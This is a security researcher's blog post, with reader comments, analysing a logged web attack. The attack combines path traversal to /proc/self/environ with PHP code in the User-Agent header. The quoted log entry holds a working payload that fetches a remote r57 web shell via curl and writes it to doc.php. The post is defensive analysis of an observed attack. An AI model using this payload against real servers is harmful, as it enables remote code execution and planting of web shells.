PHP in the user agent (attacking log analysis tools?)

Lately I started to see a few web-based attacks with a php script inside the user agent. Something like this:

a.b.229.82 – – [19/Jan/2010:22:43:39 -0700]
“GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../..
/../../proc/self/environ HTTP/1.1″ 200 3820 “-” “< ? echo
‘_rce_';echo php_uname();echo ‘_rce_';$ch=curl_init();curl_setopt($ch, CURLOPT_URL,
‘’);curl_setopt($ ch, CURLOPT_CONNECTTIMEOUT, 15);curl_setopt($ch,
CURLOPT_TIMEOUT, 15);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$cont=curl_exec($ch);
curl_close($ch);$fh=fopen(‘doc.php’, ‘w’ );fwrite($fh, $cont);fclose($fh); ?>

So, inside the user agent it is starting a PHP script that tries to download the file, which is the r57shell.php.

My guess is that it is trying to exploit a web stats or log analysis tool (like webalizer, google analytics, ossec, etc), but I couldn’t find which one is vulnerable to that. Any ideas?

**this is what the r57shell looks like:;=blacklist&seeall;=1&detail;=eadbf8dc38276dba3df4d6db9608db74

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Dmitry Evteev

    used vulnerability LFI via Process Environ, see this

  • Rodrigo “Sp0oKeR” Montoro

    I posted at N-Stalker blog last year about that. Take a look


  • Black

    Yep! Dmitry my friend is right. A question to Rodrigo on the same lines – Did you implement this feature in N-Stalker? I had requested that it be included in NetSparker.

  • Dmitry Evteev

    >> Did you implement this feature in N-Stalker?

    i not know.

  • Php Programmer

    Nice post. Just wanted to say thanks for taking the time to write it!

  • Quifodao22

    mestre visto amex